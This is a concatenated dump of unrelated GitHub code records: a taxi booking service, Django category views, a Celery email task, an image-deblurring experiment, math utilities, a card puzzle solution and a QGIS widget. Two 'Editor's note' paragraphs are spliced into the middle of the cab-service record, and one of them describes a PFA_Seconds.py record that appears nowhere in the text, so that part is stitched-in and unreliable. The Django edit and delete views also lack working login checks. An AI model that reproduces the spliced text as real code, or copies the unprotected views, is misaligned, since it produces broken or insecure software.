None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.assignedDriver = None\n self.price = 0.00\n self.tax = 0.00\n self.totalCost = 0.00\n\n\nclass Drivers:\n _drivers = {\n 1: {\"name\": \"Sean\", 
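Editor's note: the PFA_Seconds.py record above integrates its rate equations with a fixed one-second explicit-Euler step. A stripped-down sketch of the same scheme on a generic reversible reaction A + B <=> C; the rate constants and initial concentrations are made up for illustration:

# Explicit Euler: c(t + dt) = c(t) + dt * dc/dt, with dt = 1 s as in the script.
k_f, k_r = 1e-3, 1e-4            # hypothetical forward/reverse rate constants
conA, conB, conC = 2.0, 1.5, 0.0
history = []
for _ in range(600):             # 10 simulated minutes, one step per second
    rate = k_f * conA * conB - k_r * conC
    conA -= rate
    conB -= rate
    conC += rate
    history.append(conC)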
\"dedicatedRoutes\": [\"Los-Angeles\", \"San-Jose\"], \"Status\": \"Available\", \"CarModel\": \"Hyundai\"},\n 2: {\"name\": \"Dan\", \"dedicatedRoutes\": [\"Santa-Clara\", \"Fremont\"], \"Status\": \"Available\", \"CarModel\": \"Honda\"},\n 3: {\"name\": \"Pat\", \"dedicatedRoutes\": [\"Santa-Clara\", \"San-Diego\"], \"Status\": \"Available\", \"CarModel\": \"Mazda\"},\n 4: {\"name\": \"Jenny\", \"dedicatedRoutes\": [\"Cupertino\", \"Fremont\"], \"Status\": \"Available\", \"CarModel\": \"Mercedes\"},\n 5: {\"name\": \"Aladin\", \"dedicatedRoutes\": [\"San-Diego\", \"San-Francisco\"], \"Status\": \"Available\", \"CarModel\": \"Volvo\"},\n }\n\n def __init__(self, _drivers):\n self._drivers = _drivers\n\n def getEligibleDrivers(self, locationName):\n eligible_drivers = {key: value for key, value in self._drivers.items(\n ) if locationName in value[\"dedicatedRoutes\"]}\n return eligible_drivers\n\n def assignDriver(self, locationName):\n availableDriverKeys = self.getEligibleDrivers(locationName).keys()\n if not availableDriverKeys:\n return None\n availableDriver = list(availableDriverKeys)[-1]\n self._drivers[availableDriver][\"Status\"] = \"Booked\"\n driverToRemove = {key: value for key,\n value in self._drivers.items() if key == availableDriver}\n assignedDriver = driverToRemove, self._drivers.pop(availableDriver)\n return assignedDriver[0]\n\n def getAvailableDrivers(self):\n return self._drivers\n\n\nclass CabService:\n _costPerMile = 2.5\n _tax = [0.05, 0.10, 0.15]\n\n def __init__(self, chaffeur: Drivers, route: Places):\n self.chaffeur = chaffeur\n self.route = route\n self._patronageRecord = {}\n\n def getTax(self):\n return self._tax\n\n def bookARide(self, bookingRequest: InitiateBookingRequest) -> RideBookingOrder:\n rideOrder = RideBookingOrder.create()\n rideOrder.customerId = bookingRequest.customerId\n rideOrder.customerName = bookingRequest.customerName\n rideOrder.customerEmail = bookingRequest.customerEmail\n rideOrder.pickUpLocation = bookingRequest.pickUpLocation\n rideOrder.dropOffLocation = bookingRequest.dropOffLocation\n rideOrder.distance = bookingRequest.distance\n rideOrder.assignedDriver = bookingRequest.assignedDriver\n\n rideOrder = self._pairWithADriver(rideOrder)\n\n if rideOrder != None:\n self._patronageRecord[rideOrder.id] = rideOrder\n return rideOrder\n\n def _pairWithADriver(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n if rideOrder.pickUpLocation not in self.route._locationsMap:\n return None\n\n rideOrder.assignedDriver = self.chaffeur.assignDriver(\n rideOrder.pickUpLocation)\n\n return rideOrder\n\n def _computeDistance(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n rideOrder.distance = self.route.getDistance(rideOrder.pickUpLocation,\n rideOrder.dropOffLocation)\n return rideOrder\n\n def _costEstimator(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n totalDistance = self.route.getDistance(\n rideOrder.pickUpLocation, rideOrder.dropOffLocation)\n rideOrder.price = self._costPerMile * totalDistance\n return rideOrder\n\n def _endRide(self, rideOrder: RideBookingOrder) -> CustomerBill:\n invoice = CustomerBill()\n\n if rideOrder.price <= 10:\n totalCost = rideOrder.price * self._tax[0] + rideOrder.price\n elif rideOrder.price > 10 and rideOrder.price < 20:\n totalCost = rideOrder.price * self._tax[1] + rideOrder.price\n else:\n totalCost = rideOrder.price * self._tax[2] + rideOrder.price\n\n totalCost = totalCost\n\n invoice.totalCost = totalCost\n invoice.customerId = rideOrder.customerId\n invoice.customerName = 
rideOrder.customerName\n invoice.customerEmail = rideOrder.customerEmail\n invoice.pickUpLocation = rideOrder.pickUpLocation\n invoice.dropOffLocation = rideOrder.dropOffLocation\n invoice.distance = rideOrder.distance\n invoice.price = rideOrder.price\n invoice.assignedDriver = rideOrder.assignedDriver\n\n if rideOrder.price <= 10:\n taxApplied = self._tax[0]\n elif rideOrder.price > 10 and rideOrder.price < 20:\n taxApplied = self._tax[1]\n elif rideOrder.price >= 20:\n taxApplied = self._tax[2]\n invoice.tax = taxApplied\n return invoice\n","repo_name":"seniroberts/Expressions","sub_path":"Python/MiniProjects/TaxiService/CabService.py","file_name":"CabService.py","file_ext":"py","file_size_in_byte":7714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7264521169","text":"from django.shortcuts import redirect, render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom category import models\n\nfrom category.models import Category\n\n\ndef category(request):\n cat=Category.objects.all()\n context={\n 'cat': cat\n }\n return render(request,'admin_side/category.html',context)\n\n\n\n\n@login_required(login_url='admin_login')\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == 'POST':\n category_name = request.POST.get('name')\n cat_image = request.FILES.get('image')\n description = request.POST.get('description')\n new_category = Category(\n cat_image=cat_image,\n category_name=category_name,\n description=description\n )\n \n new_category.save()\n return redirect('category:category')\n return render(request,'admin_side/add_category.html')\n\n else:\n # Handle the case where the user is not a superuser (optional)\n return redirect('admin_login')\n\n\n\n\nlogin_required(login_url='admin_login')\ndef edit_category(request, cat_id):\n if request.user.is_superuser:\n if request.method=='POST':\n category_name=request.POST.get('category_name')\n \n description=request.POST.get('description')\n cat = Category.objects.get(id=cat_id)\n if Category.objects.filter(category_name = category_name , description = description).exists():\n messages.error(request,'already taken')\n print('already taken')\n return redirect('category:category')\n cat.category_name = category_name \n \n cat.description = description\n cat_image=request.FILES.get('cat_image')\n if cat_image:\n cat.cat_image = cat_image\n else:\n pass\n cat.save()\n \n cat=Category.objects.all().order_by('id')\n context={\n cat:'cat'\n }\n return redirect('category:category')\n return render(request,'admin_side/edit_category.html')\n\n\ndef delete_category(request,cat_id): \n \n try :\n category_to_delete = Category.objects.get(id=cat_id)\n category_to_delete.delete()\n messages.success(request,'delete successfully')\n except Category.DoesNotExist:\n messages.error(request,'item does not exist')\n return redirect ('category:category')\n ","repo_name":"Shibinashiq/ecommerce","sub_path":"category/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20237164485","text":"bind = '0.0.0.0:3080'\n\nworkers = 4\n\nproc_name = 'app'\n\nloglevel = 'debug'\n\nlogfile = './log/debug.log'\n\naccesslog = \"./log/access.log\"\naccess_log_format = '%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s %(D)d'\n\ntimeout = 90\n\nkeepalive = 75 # needs to be longer than the ELB idle 
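Editor's note: end to end, the CabService classes in the record above are meant to be wired together roughly as follows. This is a sketch, not the author's driver code: the customer data is invented, and _costEstimator/_endRide are called directly despite their private naming.

route = Places(Places._locationsMap)       # reuse the built-in location table
chauffeur = Drivers(Drivers._drivers)
service = CabService(chauffeur, route)

request = InitiateBookingRequest.create()
request.customerName = "Alice"             # hypothetical customer
request.pickUpLocation = "San-Jose"
request.dropOffLocation = "Fremont"

order = service.bookARide(request)
if order is not None and order.assignedDriver is not None:
    order = service._costEstimator(order)  # price = 2.5 per mile of distance
    bill = service._endRide(order)         # applies the 5/10/15% tax brackets
    print(bill.totalCost)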
timeout\n\nworker_class = 'gevent'\n","repo_name":"Wanke15/k8s-learn","sub_path":"conf/gunicorn.py","file_name":"gunicorn.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8442036352","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ValidationError\nfrom mecc.apps.utils.queries import rules_degree_for_year, rules_since_ever\nfrom mecc.apps.institute.models import Institute\nfrom mecc.apps.utils.queries import currentyear\n\n\nclass DegreeType(models.Model):\n \"\"\"\n Degree Type model\n \"\"\"\n display_order = models.IntegerField(\n _('Numéro ordre affichage'), unique=False)\n is_in_use = models.BooleanField(_('En service'))\n short_label = models.CharField(_('Libellé court'), max_length=40)\n long_label = models.CharField(_('Libellé long'), max_length=70)\n ROF_code = models.CharField(\n _('Correspondance ROF'), max_length=2, blank=True, null=True)\n\n def __str__(self):\n return self.short_label\n\n class Meta:\n ordering = ['display_order', 'short_label']\n permissions = (\n ('can_view_degree_type',\n _('Peut voir les types de diplôme')),\n )\n\n def get_absolute_url(self):\n return reverse('degree:type')\n\n def clean_fields(self, exclude=None):\n if self.display_order is None or self.display_order < 0:\n raise ValidationError({'display_order': [\n _('L\\'ordre d\\'affichage doit être positif.'),\n ]})\n if not self.is_in_use:\n c = currentyear()\n rules = rules_degree_for_year(\n self.pk, c.code_year) if self.pk is not None else None\n if rules is None:\n return\n else:\n raise ValidationError(_('La mise hors service ne peut s\\'effectuer \\\n que si aucune règle n\\'y est rattachée pour l\\'année \\\n universitaire \\n %s' % [e.label for e in rules]))\n\n def delete(self):\n rules = rules_since_ever(self.pk) if self.pk is not None else None\n if rules is None:\n super(DegreeType, self).delete()\n else:\n raise ValidationError(_(\"Vous ne pouvez pas supprimer un type \\\n de diplôme qui contient des règles\"))\n\n\nclass Degree(models.Model):\n \"\"\"\n Degree model\n \"\"\"\n label = models.TextField(_(\"Libellé réglementaire\"))\n degree_type = models.ForeignKey(\n DegreeType, verbose_name=_(\"Type de diplôme\"))\n degree_type_label = models.CharField(\n _('Libellé du type de diplôme'), max_length=120)\n is_used = models.BooleanField(_('En service'), default=True)\n start_year = models.IntegerField(_('Code année de début de validité'))\n end_year = models.IntegerField(_('Code année de fin de validité'))\n ROF_code = models.CharField(_(\"Référence Programme ROF\"), max_length=20)\n APOGEE_code = models.CharField(\n _(\"Référence dans le SI Scolarité (APOGEE)\"), max_length=40)\n institutes = models.ManyToManyField(Institute)\n\n @property\n def get_id_type(self):\n return self.degree_type.id\n\n @property\n def get_short_label_type(self):\n return self.degree_type.short_label\n\n class Meta:\n ordering = ['degree_type_label', 'label']\n","repo_name":"unistra/eva","sub_path":"mecc/apps/degree/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8003924157","text":"\"\"\"src/tasks/tasks.py\"\"\"\n\nimport smtplib\nfrom email.message import EmailMessage\n\nfrom celery import Celery\nfrom src.config import SMTP_HOST, SMTP_PASS, 
SMTP_PORT, SMTP_USER\nfrom src.domain.orders import OrderPublic\nfrom src.domain.users import User\n\ncelery = Celery(\"tasks\", broker=\"redis://localhost:6379\")\n\n\ndef get_email(user: User, subject: str, orders: list[OrderPublic]):\n \"\"\"Email message options\"\"\"\n\n email = EmailMessage()\n email[\"Subject\"] = subject\n email[\"From\"] = SMTP_USER\n email[\"To\"] = user.email\n\n # Create the email content using the orders_public list and the user object\n if user.is_manager:\n email_content = (\n f\"Dear {user.first_name},\\n\\n\"\n f\"The following orders have been updated:\\n\"\n )\n for order in orders:\n email_content += (\n f\"- Order ID: {order.id},\\n\"\n f\"- Product ID: {order.product_id},\\n\"\n f\"- Quantity: {order.amount},\\n\"\n f\"- Delivery Address: {order.delivery_address},\\n\"\n f\"- Order Date: {order.order_date}\\n\"\n )\n else:\n email_content = (\n f\"Dear {user.first_name} {user.last_name},\\n\\n\"\n f\"The following orders have been updated:\\n\"\n )\n for order in orders:\n email_content += (\n f\"- Product ID: {order.product_id},\\n\"\n f\"Quantity: {order.amount},\\n\"\n f\"Order Date: {order.order_date}\\n\"\n )\n\n email_content += \"\\nBest regards,\\nYour FastAPI Store\"\n\n email.set_content(email_content)\n\n return email\n\n\n@celery.task\ndef send_email(user_: User, subject_: str, orders_: list[OrderPublic]):\n \"\"\"Send Email message\"\"\"\n\n email = get_email(user=user_, subject=subject_, orders=orders_)\n with smtplib.SMTP_SSL(SMTP_HOST, SMTP_PORT) as server:\n server.login(SMTP_USER, SMTP_PASS)\n server.send_message(email)\n","repo_name":"Rostyslav-Coder/FastAPI_Store","sub_path":"src/celery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25764167607","text":"# import packages\nimport os\nimport sys\nfrom pathlib import Path\nsys.path.append(str(Path(__file__).resolve().parent.parent/\"training\"))\nimport random\n\nimport argparse\nimport numpy as np\nfrom numpy.fft import fft2, ifft2\nimport pandas as pd\nimport skimage.io as io\nfrom skimage.metrics import peak_signal_noise_ratio, structural_similarity, mean_squared_error\nfrom skimage.filters import gaussian\nfrom pypher.pypher import psf2otf\nimport matplotlib.pyplot as plt\n\n# import our Adam-based deconvolution code\nfrom helper.deconv_adam import *\nimport trainer\nimport training.utils\n\n# random.seed(2022)\n\n# helper function for computing a 2D Gaussian convolution kernel\ndef fspecial_gaussian_2d(size, sigma):\n kernel = np.zeros(tuple(size))\n kernel[size[0]//2, size[1]//2] = 1\n kernel = gaussian(kernel, sigma)\n return kernel/np.sum(kernel)\n\ndef deconvolve(img,b,c,lam,num_iters,learning_rate,prior_name,model):\n x_adam_prior = np.zeros(np.shape(b))\n for it in range(3):\n x_adam_prior[:, :, it] = deconv_adam_tv(b[:, :, it], c, lam, num_iters, learning_rate, prior_name, device, model=model)\n # clip results to make sure it's within the range [0,1]\n x_adam_prior = np.clip(x_adam_prior, 0.0, 1.0)\n # compute PSNR using skimage library and round it to 2 digits\n PSNR_ADAM_PRIOR = round(peak_signal_noise_ratio(img, x_adam_prior), 1)\n SSIM_ADAM_PRIOR = structural_similarity(img,x_adam_prior,data_range=x_adam_prior.max()-x_adam_prior.min(),multichannel=True)\n MSE_ADAM_PRIOR = mean_squared_error(img,x_adam_prior)\n return x_adam_prior, PSNR_ADAM_PRIOR, SSIM_ADAM_PRIOR, MSE_ADAM_PRIOR\n\ndef blur_image(img):\n # simulated measurements for 
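Editor's note: because send_email in the record above is decorated with @celery.task, callers enqueue it through the Redis broker rather than invoking it inline. A minimal sketch — the worker command and the user/orders objects are illustrative, and the arguments must be serializable by whatever Celery serializer is configured:

# Start a worker in another shell first, e.g.:
#   celery -A src.celery.tasks worker --loglevel=info
from src.celery.tasks import send_email

# user and orders would normally come from the application layer.
send_email.delay(user, "Your orders were updated", orders)  # async via Redis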
all 3 color channels\n b = np.zeros(np.shape(img))\n for it in range(3):\n b[:, :, it] = blur_kernel(img[:, :, it]) + NOISE_SIGMA * np.random.randn(img.shape[0], img.shape[1])\n return b\n\ndef calc_metrics_all_priors(img, b, c, prior_list, lam, num_iters, learning_rate,model):\n \"\"\"\n Deconvolves and calculates metrics for all priors\n img: true image\n b: blurred image\n c: blur kernel\n lam: weighting of prior term\n model: model for cross entropy and kl divergence prior\n \"\"\"\n x_all = []\n PSNRS = []\n MSES = []\n SSIMS = []\n for i in range(len(prior_list)):\n # run PyTorch-based Adam solver for each color channel with different regularizers\n img_run = img.copy()\n b_run = b.copy()\n x_adam, PSNR_adam, SSIM_adam, MSE_adam = deconvolve(img_run,b_run,c,lam,num_iters,learning_rate,prior_list[i],model=model)\n x_all.append(x_adam)\n PSNRS.append(PSNR_adam)\n SSIMS.append(SSIM_adam)\n MSES.append(MSE_adam)\n return x_all, PSNRS, SSIMS, MSES\n\n\n\nif __name__==\"__main__\":\n #For different experiments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-b\",help=\"blur kernel set select, 0,1,or 2\", type=int, required=True)\n parser.add_argument(\"-l\",help=\"Lamda set select, 0,1\", type=int, required=True)\n parser.add_argument(\"-n\",help=\"Noise level set select, 0,1\", type=int, required=True)\n\n args = parser.parse_args()\n \n gpu_id = 0\n \n #Hyperparameters\n BLUR_KERNEL_SET_ALL = [(10,1.5),(30,4.5),(60,6.5)]\n LAM_ALL = [0.05,0.5]\n NOISE_ALL = [0.15,0.05]\n \n idx_blur_kernel = args.b\n idx_lam = args.l\n idx_noise = args.n\n \n BLUR_KERNEL_SET = BLUR_KERNEL_SET_ALL[idx_blur_kernel]\n BLUR_SIZE = (BLUR_KERNEL_SET[0],BLUR_KERNEL_SET[0])\n BLUR_SIGMA = BLUR_KERNEL_SET[1]\n NOISE_SIGMA = NOISE_ALL[idx_noise]\n # NOISE_SIGMA = 0.05\n \n SAMPLE = 150\n LAM = LAM_ALL[idx_lam] # relative weight of prior term\n NUM_ITERS = 75 # number of iterations for Adam\n LEARNING_RATE = 5e-2 # learning rate\n FILE_NAME = f\"./results/fullexp_{BLUR_SIZE[0]}_{BLUR_SIGMA}_{NOISE_SIGMA}_{LAM}.npy\"\n PRIOR_LIST = [\"no_prior\",\"anisotropic_tv\",\"isotropic_tv\",\"hessian_schatten\",\"l1\",\"l2\",\"laplacian\",\"maximize_cells\",\"cross_entropy\",\"kl_divergence\"]\n\n\n print(\"Selected Hyperparameters:\")\n print(f\"Blur Kernel: {BLUR_KERNEL_SET}\\nNoise Sigma: {NOISE_SIGMA}\\nLambda: {LAM}\")\n print(f\"Priors order: {PRIOR_LIST}\")\n \n #Different models for different blur and sigma values\n #10, 1.5, 0.15\n if idx_blur_kernel==0:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_10/saved_models/Checkpoint_06Dec12_24_30_1.00.pt\"\n #30, 4.5, 0.15\n elif idx_blur_kernel==1:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_30/saved_models/Checkpoint_06Dec12_34_25_1.00.pt\"\n #60, 6.5, 0.15\n elif idx_blur_kernel==2:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_60/saved_models/Checkpoint_06Dec12_32_15_1.00.pt\"\n else:\n raise ValueError\n\n print(f\"Model path: {MODEL_PATH}\")\n\n #Load test dataset, we dont use the blur size, sigma, and blur sigma\n DATASET={\n \"subclass_name\": \"ce_prior\",\n \"path\": \"./dataset\",\n \"mask_pth\": \"./dataset/masks\",\n \"blur_size\": BLUR_SIZE[0],\n \"blur_sigma\": BLUR_SIGMA,\n \"sigma\": NOISE_SIGMA,\n \"train_batch_size\": 32,\n \"test_batch_size\": 32,\n \"tile_h\": 256,\n \"tile_w\": 256,\n \"tile_stride_factor_w\": 5,\n \"tile_stride_factor_h\": 5,\n \"lwst_level_idx\": 0,\n \"threshold\": 0.7\n }\n\n #Load model for CE/KL priors\n device = torch.device(f\"cuda:{gpu_id}\")\n model = 
trainer.Model.create(subclass_name=\"ce_prior\")\n state = torch.load(MODEL_PATH, map_location=device)\n model.load_state_dict(state[\"model_state_dict\"])\n model = model.to(device)\n model.eval()\n\n #disable gradient descent for the model\n for params in model.parameters():\n params.requires_grad=False\n\n #Load dataset\n fulldataset = trainer.Dataset.create(**DATASET)\n dataset = fulldataset.testset.image_dataset\n\n c = fspecial_gaussian_2d(BLUR_SIZE, BLUR_SIGMA)\n cFT = psf2otf(c, (dataset[0].shape[0], dataset[0].shape[1]))\n blur_kernel = lambda x: np.real(ifft2(fft2(x) * cFT))\n\n\n #Run experiment over an image\n img_idx = 56\n img = dataset[img_idx]/255\n b = blur_image(img)\n x_all,psnrs,ssims,mses = calc_metrics_all_priors(img, b, c, PRIOR_LIST, LAM, NUM_ITERS, LEARNING_RATE, model)\n\n img_dir_path = f\"./results/priors_{img_idx}\"\n os.mkdir(img_dir_path)\n fig = plt.figure()\n plt.imshow(img)\n plt.title(\"Target Image\", fontsize=10)\n plt.axis(\"off\")\n plt.savefig(Path(img_dir_path)/\"image.png\")\n\n fig = plt.figure()\n plt.imshow(b)\n plt.title(\"Blurry and Noisy Image,\\nPSNR: {:.2f}\\nSSIM: {:.2f}\".format(peak_signal_noise_ratio(img, b),structural_similarity(img,b,data_range=b.max()-b.min(),multichannel=True)), fontsize=10)\n plt.axis(\"off\")\n plt.savefig(Path(img_dir_path)/\"blurimage.png\")\n\n for i in range(len(PRIOR_LIST)):\n fig = plt.figure()\n plt.imshow(x_all[i])\n plt.title(\"{},\\nPSNR: {:.2f}\\nSSIM: {:.2f}\".format(PRIOR_LIST[i],psnrs[i],ssims[i]), fontsize=10)\n plt.axis(\"off\") \n plt.savefig(Path(img_dir_path)/f\"{PRIOR_LIST[i]}.png\")\n","repo_name":"Vishwesh4/PriorsDeconvolution","sub_path":"get_image.py","file_name":"get_image.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12356470551","text":"# coding: utf-8\n\n\nfrom sympy import symbols\nfrom sympy import Tuple\nfrom sympy import Matrix\nfrom sympy import srepr\nfrom sympy import Symbol\n\nfrom sympde import Constant\n\nfrom sympde.exterior import d, wedge, ip, jp, delta, hodge\nfrom sympde.exterior import DifferentialForm\n\n\n\n#==============================================================================\ndef test_exterior_1():\n\n x, y, z = symbols('x y z')\n a = Constant('a')\n n = Symbol('n')\n\n # ...\n u_0 = DifferentialForm('u_0', index=0, dim=n)\n v_0 = DifferentialForm('v_0', index=0, dim=n)\n\n u_1 = DifferentialForm('u_1', index=1, dim=n)\n v_1 = DifferentialForm('v_1', index=1, dim=n)\n\n u_2 = DifferentialForm('u_2', index=2, dim=n)\n v_2 = DifferentialForm('v_2', index=2, dim=n)\n\n u_3 = DifferentialForm('u_3', index=3, dim=n)\n v_3 = DifferentialForm('v_3', index=3, dim=n)\n\n u_n = DifferentialForm('u_n', index=n, dim=n)\n v_n = DifferentialForm('v_n', index=n, dim=n)\n # ...\n\n # ... exterior derivative\n assert(d(d(u_0)) == 0)\n assert(d(u_0+v_0) == d(u_0) + d(v_0))\n assert(d(2*u_0) == 2*d(u_0))\n assert(d(a*u_0+v_0) == a*d(u_0) + d(v_0))\n assert(d(u_n) == 0)\n assert(not(d(u_0) == 0))\n # ...\n\n # ...\n assert(delta(u_0) == 0)\n assert(delta(u_1+v_1) == delta(u_1) + delta(v_1))\n assert(delta(2*u_1) == 2*delta(u_1))\n assert(delta(a*u_1+v_1) == a*delta(u_1) + delta(v_1))\n assert(not(delta(u_n) == 0))\n # ...\n\n # ... exterior product\n print('> ', wedge(u_0, u_1))\n # ...\n\n # ... 
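Editor's note: the blur_kernel lambda in the get_image.py record above implements convolution as a pointwise product in the Fourier domain. A self-contained sketch of that pattern with a synthetic image; psf2otf pads and centres the PSF so the product matches circular convolution:

import numpy as np
from numpy.fft import fft2, ifft2
from pypher.pypher import psf2otf

img = np.random.rand(64, 64)               # synthetic test image
psf = np.ones((5, 5)) / 25.0               # 5x5 box blur, normalized to sum 1
otf = psf2otf(psf, img.shape)              # PSF -> OTF at the image size
blurred = np.real(ifft2(fft2(img) * otf))  # circular convolution via FFT
assert blurred.shape == img.shape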
hodge operator\n print('> ', hodge(u_0))\n # ...\n\n print(hodge(hodge(u_0)))\n print(hodge(hodge(u_1)))\n print(hodge(hodge(u_2)))\n print(hodge(hodge(u_3)))\n\n\n#==============================================================================\n# CLEAN UP SYMPY NAMESPACE\n#==============================================================================\n\ndef teardown_module():\n from sympy.core import cache\n cache.clear_cache()\n\ndef teardown_function():\n from sympy.core import cache\n cache.clear_cache()\n\n#test_exterior_1()\n","repo_name":"pyccel/sympde","sub_path":"sympde/exterior/tests/test_exterior.py","file_name":"test_exterior.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"12970680977","text":"#myPow by Matthew Rothamn\r\n\r\n#define fucntion two variables\r\ndef myPow(x,y):\r\n#since exponents set to 0 = 1 return 1 if this happens\r\n if y == 0:\r\n return 1\r\n#else run recursive exponential function that multiple into itself based on the exponent\r\n else:\r\n return x * myPow(x,y-1)\r\n#input base and exponent\r\nx = int(input(\"enter value for base 'x'\"))\r\ny = int(input(\"enter value for exponenet 'y'\"))\r\n#print\r\nprint(myPow(x,y))\r\n \r\n","repo_name":"MatthewRothman2/For-Resume","sub_path":"githubsubmit/mypow.py","file_name":"mypow.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36135104834","text":"\"\"\"\nYou are given an integer array deck where deck[i] represents the number written on the ith card.\n\nPartition the cards into one or more groups such that:\n\nEach group has exactly x cards where x > 1, and\nAll the cards in one group have the same integer written on them.\nReturn true if such partition is possible, or false otherwise. 
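Editor's note: the recursive myPow in the record above costs O(y) calls and has no guard against negative exponents (a negative y would recurse forever). A common alternative is exponentiation by squaring, sketched here for y >= 0, matching the original's implicit assumption:

def my_pow_fast(x, y):
    # O(log y) multiplications via binary exponentiation.
    result = 1
    while y > 0:
        if y & 1:        # current low bit set: fold in one factor of x
            result *= x
        x *= x           # square the base
        y >>= 1          # shift to the next bit of the exponent
    return result

assert my_pow_fast(2, 10) == 1024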
\n\nExample 1:\n\nInput: deck = [1,2,3,4,4,3,2,1]\nOutput: true\nExplanation: Possible partition [1,1],[2,2],[3,3],[4,4].\nExample 2:\n\nInput: deck = [1,1,1,2,2,2,3,3]\nOutput: false\nExplanation: No possible partition.\n\"\"\"\nclass Solution(object):\n def gdc(self, a, b):\n if a % b == 0:\n return b\n else:\n return self.gdc(b, a % b)\n \n def hasGroupsSizeX(self, deck):\n \"\"\"\n :type deck: List[int]\n :rtype: bool\n \"\"\"\n if len(deck) <= 1:\n return False\n \n uniq = dict()\n for i in deck:\n if i not in uniq:\n uniq[i] = 1\n else:\n uniq[i] += 1\n\n g = uniq[deck[0]]\n\n for v in uniq.values():\n g = self.gdc(g, v)\n print(g)\n if g == 1:\n return False\n\n return True\n \n\nsolution = Solution()\nprint(solution.hasGroupsSizeX([1,2,3,4,4,3,2,1]))\nprint(solution.hasGroupsSizeX([1,1,1,2,2,2,3,3]))\n# print(solution.hasGroupsSizeX([1,1,1,1,2,2,2,2,2,2]))","repo_name":"MeongGanas/leetcode-python","sub_path":"easy/X_of_a_Kind_in_a_Deck_of_Cards.py","file_name":"X_of_a_Kind_in_a_Deck_of_Cards.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72652792168","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThemaMap\n\"\"\"\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\n\nfrom .themamap_renderer import ThemaMapRenderer\nfrom .themamap_utils import layer_attributes\nfrom .ui_themamap import Ui_ThemaMapWidget\nfrom .colortables import colortables as ct\n\nimport resources\n\n\n# ColorButton class from VectorFieldRenderer plugin\n# http://plugins.qgis.org/plugins/VectorFieldRenderer/\n# https://github.com/ccrook/QGIS-VectorFieldRenderer-Plugin\nclass ColorButton( QObject ):\n\n def __init__(self, button):\n QObject.__init__(self)\n self.button = button\n button.clicked.connect(self.clicked)\n\n def color(self):\n return self.button.color()\n\n def setColor(self, color):\n if color.isValid():\n self.button.setColor(color)\n\n def clicked(self):\n self.setColor(QColorDialog.getColor(self.color()))\n\n\ndef string2list(s):\n s = s.replace('/',' ')\n s = s.replace(';',' ')\n s = s.replace(',',' ')\n s = s.replace(' ', ' ')\n l = []\n for el in s.split(' '):\n if len(el) > 0: l.append(el)\n return l\n\n\nclass ThemaMapWidget(QgsRendererV2Widget, Ui_ThemaMapWidget):\n \n choroplethSchemeTypes = ['sequential', 'divergent', 'qualitative']\n \n def __init__(self, layer, style, renderer):\n QgsRendererV2Widget.__init__(self, layer, style)\n if renderer is None or renderer.type() != ThemaMapRenderer.rendererName:\n self.r = ThemaMapRenderer()\n else:\n self.r = renderer\n self.valid = True # can the layer be rendered?\n self.layer = layer\n self.setupUi(self)\n self.buildWidget()\n self.loadUi()\n \n def renderer(self):\n if self.valid: self.applyUi()\n return self.r\n \n def buildWidget(self):\n self.symbolStyleFillColor = ColorButton(self.uSymbolStyleFillColor)\n self.symbolStyleStrokeColor = ColorButton(self.uSymbolStyleStrokeColor)\n self.choroplethFillColor = ColorButton(self.uChoroplethFillColor)\n self.choroplethStrokeColor = ColorButton(self.uChoroplethStrokeColor)\n \n def loadUi(self):\n \"\"\"\n Fills the UI using the values in the renderer.\n \"\"\"\n # prop symbol tab\n self.uPropSymbAttrMenu.clear()\n self.uPropSymbAttrMenu.addItem('')\n for attr in layer_attributes(self.layer):\n self.uPropSymbAttrMenu.addItem(attr)\n if attr == self.r.propsymbol.attr:\n self.uPropSymbAttrMenu.setCurrentIndex(self.uPropSymbAttrMenu.count()-1)\n 
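Editor's note: the deck-partition solution above hand-rolls both the frequency count and the gcd. The same idea fits in a few lines with the standard library — sketched as an equivalent alternative, not the author's code:

from collections import Counter
from functools import reduce
from math import gcd

def has_groups_size_x(deck):
    if not deck:
        return False
    counts = Counter(deck).values()
    # A valid group size x > 1 exists iff all counts share a divisor > 1.
    return reduce(gcd, counts) >= 2

assert has_groups_size_x([1, 2, 3, 4, 4, 3, 2, 1]) is True
assert has_groups_size_x([1, 1, 1, 2, 2, 2, 3, 3]) is False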
